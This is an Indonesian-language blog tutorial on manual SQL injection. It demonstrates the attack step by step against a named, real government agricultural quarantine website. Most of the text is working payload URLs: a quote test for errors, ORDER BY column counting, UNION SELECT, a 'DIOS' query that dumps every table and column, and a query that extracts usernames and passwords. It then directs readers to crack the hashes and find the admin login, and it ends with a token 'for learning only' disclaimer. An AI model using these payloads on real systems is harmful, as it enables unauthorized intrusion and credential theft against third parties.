Tutorial SQL Injection Manual

Tutorial SQL Injection manual

Oke Guyss kali ini saya mau share tutorial SQL Injection manual

Sebelum itu siapin dulu bahan-bahannya oke...


~ Hp

~ Kuota internet

~ Dork

~ Kegantengan juga ngaruh loh...


Pertama kalian Dorking dulu kalo kalian nggak punya dork bisa cari di google banyak

Karna disini saya sudah punya target jadi langsung aja oke....


Dan ini Target saya


http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=33


Kalian cek dulu websitenya apakah rentan terhadap SQLi atau tidak

Cara cek nya guampang banget kalian kasih tanda ' itu di belakang nya


http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=33'


Di belakangnya ya...

Sebelum..

Sesudah...

Nah kalo blank website berarti vulnerability terhadap SQLi

Abis itu kita tambahin string -- - kek gitu pasti web nya jadi gak blank lagi :)

Tinggal kita cari berapa column di web nya :v


http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=33'order by 1-- -


http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=33'order by 2-- -


http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=33'order by 3-- -


http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=33'order by 4-- -


Di angka 4 web saya blank lagi berarti column nya adalah 4

Ganti order by nya jadi union select


http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=33'Union Select 1,2,3,4-- -


Nanti akan keluar angka ajaib seperti ini...

keluar angka 2 dan 4 kalian bisa pilih salah satu..


 berikut beberapa command SQLi

 user()

database()

@@version

@@hostname

@@datadir


Kalian tinggal pilih command diatas nya


http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=33'Union Select 1,user(),3,4-- -


Langsung biar Gak lama kasih Dios nya


 make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)


http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=33'Union Select 1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),3,4-- -

Kalian taro Dios nya di angka ajaib nya nanti akan seperti ini

Kalo udah seperti itu langsung kalian cari usernya!!

(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x203a3a20,password,0x3c62723e))))x)


http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=-33'Union Select 1,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x203a3a20,password,0x3c62723e))))x),3,4-- -

Nanti akan seperti ini...

Tinggal kalian hash di https://hashes.com situ

Dan jangan lupa cari adlog nya :)


Mungkin itu aja dari saya :)


Kalo belum ngerti bisa chat saya

WhatsApp 081617209368


#Konten Ini Hanya Untuk Pembelajaran (Pengetahuan Semata) #Mohon Untuk Tidak Melakukanya, Kami Tidak Akan Bertanggung Jawab Atas Tindakan Hacking Apapun Yang Kalian Lakukan..!!!

Share this post